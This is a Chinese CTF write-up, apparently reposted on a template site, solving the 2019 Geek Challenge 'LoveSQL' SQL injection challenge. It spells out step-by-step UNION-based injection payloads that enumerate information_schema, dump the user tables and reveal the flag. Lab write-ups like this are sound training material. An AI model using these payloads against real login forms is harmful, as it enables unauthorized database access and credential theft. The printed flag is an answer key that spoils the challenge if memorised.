题目环境:![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-1.png)
判断注入类型
是否为数字型注入
admin1
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-2.png)
否
是否为字符型注入
admin1'
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-3.png)
是
判断注入手法类型
使用堆叠注入
采用密码参数进行注入
爆数据库1'; show database();#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-4.png)
这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入
爆字段数1';order by 4#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-5.png)
报错
抛弃堆叠注入
步入正题1' order by 4#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-6.png)
成功,但是不存在第4列
同时验证了猜想不能使用堆叠注入
继续判断列数1' order by 3#![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-7.png)
可知列数只有3列
爆数据库
使用联合查询1' union select 1,2,database()#![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-8.png)
爆数据表1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-9.png)
爆出两个表
开始爆数据表的字段
按照先后顺序把,先爆第一个
爆geekuser数据表的字段1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-10.png)
字段:id、username、password
爆geekuser数据表的所有内容1' union select 1,database(),group_concat(id,username,password) from geekuser#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-11.png)
无flag文章来源:https://www.toymoban.com/news/detail-744011.html
转手数据表l0ve1ysq1
步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值1' union select 1,database(),group_concat(password) from l0ve1ysq1#
回显结果![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-12.png)
![[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql](https://imgs.yssmx.com/Uploads/2023/11/744011-13.png)
得出flag:flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}文章来源地址https://www.toymoban.com/news/detail-744011.html
到了这里,关于[极客大挑战 2019]LoveSQL 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[极客大挑战 2019]FinalSQL(bypass盲注)](https://imgs.yssmx.com/Uploads/2024/02/704126-1.png)
![[极客大挑战 2019]PHP1-超详细](https://imgs.yssmx.com/Uploads/2024/01/401508-1.png)
![BUUCTF [极客大挑战 2019]BuyFlag1](https://imgs.yssmx.com/Uploads/2024/01/413348-1.png)
![BUUCTF [极客大挑战 2019]Knife1](https://imgs.yssmx.com/Uploads/2024/02/705951-1.png)
![[CTFTraining] ASIS CTF 2019 Quals Unicorn shop](https://imgs.yssmx.com/Uploads/2024/02/467861-1.png)
![[ CTF ]【天格】战队WriteUp-第七届“强网杯”全国安全挑战赛](https://imgs.yssmx.com/Uploads/2024/02/764494-1.png)
